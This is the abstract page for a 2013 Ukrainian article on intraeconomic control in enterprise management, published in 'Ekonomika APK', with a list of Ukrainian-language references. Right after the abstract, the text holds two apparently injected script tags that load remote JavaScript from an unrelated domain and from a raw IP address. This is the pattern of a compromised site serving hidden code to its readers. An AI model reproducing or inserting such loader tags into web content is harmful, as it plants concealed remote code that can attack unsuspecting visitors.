ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

UDS: 65.0127:650.141
Управління та інформаційне забезпечення

Intraeconomic control within the framework management of enterprises / Iavorova G.V. // Ekonomika APK. - 2013. - № 1 - P. 96

An article states that unstable economic and political processes, which take place in Ukraine, trigger the necessity of flexible control system implementation that could insure growth of the level of competitiveness and profitability of economic players. The results of management activity of enterprises mostly depend on the correctly organized dataware and effective and rational managerial decisions on the basis of use of it. Refs: 8.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Key words: economic players, intraeconomic control, competitiveness, profitability, managerial decisions, dataware

References

  1. Бутинець Ф. Ф. Контроль і ревізія / Ф. Ф. Бутинець, В.П. Бондар, Н.Г. Виговська, Н.І. Петренко: підруч. для студ. вищих навч. закладів спеціальності «Облік і аудит»; за ред. проф. Ф. Ф. Бутинця. - 4-е вид. доп. і перероб. - Житомир: ПП «Рута». 2006. - 560 с.
  2. Голов С.Ф. Бухгалтерський облік в Україні: аналіз стану та перспективи розвитку: монографія. / Голов С.Ф. - К.: Центр навчальної літератури, 2007. - 522 с.
  3. Іванюта П.В. Внутрішньогосподарський (управлінський) облік у виробничих підрозділах сільськогосподарських господарюючих суб’єктів: [навч. посіб.] / Іванюта П.В., Левченко З.М. - К.: Центр навчальної літератури, 2006. - 368 с.
  4. Кірейцев Г. Г. Регулювання розвитку бухгалтерського обліку в сільському господарстві: наук. доп. на міжнар. наук.-практ. конф. Подільського держ. аграрно-техніч. ун-ту 24-25 верес. 2009 р. / Г. Г. Кірейцев. - Кам'янець-Подільський, 2009. - 28 с.
  5. Коріяько М. Д Внутрішній контроль господарської діяльності підприємства: навч. посіб. для студ. вищ. навч. закл. / за ред.. к.е.н. проф. М. Д. Корінька. - Фастів: «Поліфаст», 2006. - 440 с.
  6. Костирко P.O. Контроль і аналіз в системі управління економічним потенціалом господарюючого суб'єкта: методологія та організація: монографія / P.O. Костирко. - Луганськ: вид-во СНУ ім. В. Даля, 2010. - 728 с.
  7. Костикова А.А. Управлінський облік в інформаційній системі управління витратами / А. А. Костякова // Економіка АПК. - 2004. - № 7. - С. 107 - 110.
  8. Подолянчук О. А. Внутрішньогосподарський контроль у діяльності сільськогосподарських підприємств / О. А. Подолянчук // Економіка АПК. - 2010. - № 10. - С. 109-112.
Read article: 13_01_14.pdf